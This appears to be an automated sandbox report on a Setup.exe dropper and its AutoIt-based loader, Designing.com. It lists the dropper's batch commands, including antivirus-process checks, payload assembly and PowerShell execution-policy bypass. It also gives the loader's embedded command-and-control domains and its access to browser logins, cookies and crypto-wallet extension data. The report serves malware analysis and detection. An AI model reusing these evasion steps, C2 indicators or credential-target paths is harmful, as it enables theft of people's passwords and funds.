YFYNDGPN
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1F4FF BlockInput,12_2_00E1F4FF
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DA338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00DA338B
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC5058 mov eax, dword ptr fs:[00000030h]12_2_00DC5058
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E020AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,12_2_00E020AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DD2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00DD2992
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00DC0BAF
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC0D45 SetUnhandledExceptionFilter,12_2_00DC0D45
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00DC0F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: rapeflowwj.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: crosshuaht.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: sustainskelet.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: aspecteirs.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: energyaffai.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: necklacebudi.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: discokeyus.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: grannyejh.lat
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: quantitypitt.click
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E01B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00E01B4D
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00DA338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00DA338B
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E0BBED SendInput,keybd_event,12_2_00E0BBED
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E0ECD0 mouse_event,12_2_00E0ECD0
                Source: C:\Users\user\Desktop\Setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 124531
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Lt
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Heater" Lance
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Designing.com z
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="bxbnwzevlkhtdosp9hk3kfhiumjhb_d.556jpjn0vjs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="bxbnwzevlkhtdosp9hk3kfhiumjhb_d.556jpjn0vjs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E014AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_00E014AE
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E01FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00E01FB0
                Source: Designing.com, 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp, Designing.com, 0000000C.00000003.2438306481.000000000528E000.00000004.00000800.00020000.00000000.sdmp, Sun.9.dr, Designing.com.2.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Designing.com | Binary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00DC0A08 cpuid 12_2_00DC0A08
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00DFE5F4 GetLocalTime,12_2_00DFE5F4
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00DFE652 GetUserNameW,12_2_00DFE652
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00DDBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00DDBCD2
                Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: Designing.com PID: 6380, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
                Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *exodus*
                Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: :"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"WB
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
